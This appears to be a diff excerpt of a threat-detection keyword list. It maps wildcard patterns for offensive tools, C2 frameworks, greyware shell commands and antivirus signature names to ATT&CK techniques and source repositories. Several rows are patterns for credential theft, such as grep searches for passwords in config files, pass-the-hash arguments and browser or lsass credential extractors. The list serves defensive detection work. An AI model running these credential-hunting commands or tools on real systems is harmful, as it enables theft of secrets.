+"*Gr1mmie/AtlasC2*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - 
T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*GrantMailboxAccess.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*GrantSamAccessPermission.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*GreatSCT.git*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*GreatSCT.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*Greenwolf*","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. 
so that reviewing this data is quicker for a human operator.","T2348 - T2349 - T2366 - T2423 - T2597 - T2596","TA0011 - TA0022 - TA0026","N/A","N/A","Information Gathering","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","10","3599","797","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z" +"*gremwell/o365enum*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*grep -* *DBPassword*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep *password /var/www*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep *password.* /etc/*.conf*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
# search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep :0: /etc/passwd*","greyware_tool_keyword","grep","Look for users with a UID of 0","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep -i pass *","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -i user *","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://gtfobins.github.io/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -R db_passwd*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
# search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep -roiE *password*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*grep*|pwd=|passwd=|password=*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep*password|pwd|pass*","greyware_tool_keyword","grep","search for passwords","T1213 - T1081","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*grep-through-commits.sh *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Group3r.cs*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*Group3r.exe*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - 
T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*Group3r/Group3r*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*GruntInjection.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gruntstager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*GruntStager.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*gtfobins*","offensive_tool_keyword","gtfobins","GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of 
legitimate binaries","T1059 - T1068 - T1043 - T1136","TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://gtfobins.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*GTFOBLookup*","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","3","215","40","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z" +"*gtworek/Priv2Admin*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*guardicore*monkey*","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. 
The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*guardicore/monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*guida.exe -*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*gunicorn ares:app*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Gupt-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*-H lm-hash:nt-hash*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'LMHASH:NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*-H 'NTHASH'*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*h2csmuggler --scan-list *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h2csmuggler -x * --test*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h8mail -*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*h8mail -t *@*.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*h8mail*","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. 
or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/khast3x/h8mail","1","0","N/A","N/A","10","3554","480","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z" +"*Ha3MrX/Gemail-Hack*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*haad/proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*hackbrowersdata.cna*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*hack-browser-data.exe*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*hack-browser-data/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" 
+"*HACKER*FUCKER*Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*hackertarget-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*hackingtool.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*Hackndo/sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Hackndo/sprayhound*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - 
TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*hackndo@gmail.com*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Hackplayers/evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hackrf_sweep -f *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hacksysteam/CVE-2023-*","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*HackTheWorld*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z"
+"*hacktool*","signature_keyword","Antivirus Signature","hacktool keyword. a repository could be named as such. o AV signature","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool.ASP.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool.HTML.*.**","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool.Java.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Hacktool.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*Hacktool.Linux*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*HackTool.PHP.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Hacktool.Windows*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Hacktool/Win.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*HackTool:Linux*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:MSIL*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:PowerShell*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:PowerShell/*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*HackTool:Python*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation 
tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:Python/*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Hacktool:SH*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:VBS*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HackTool:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
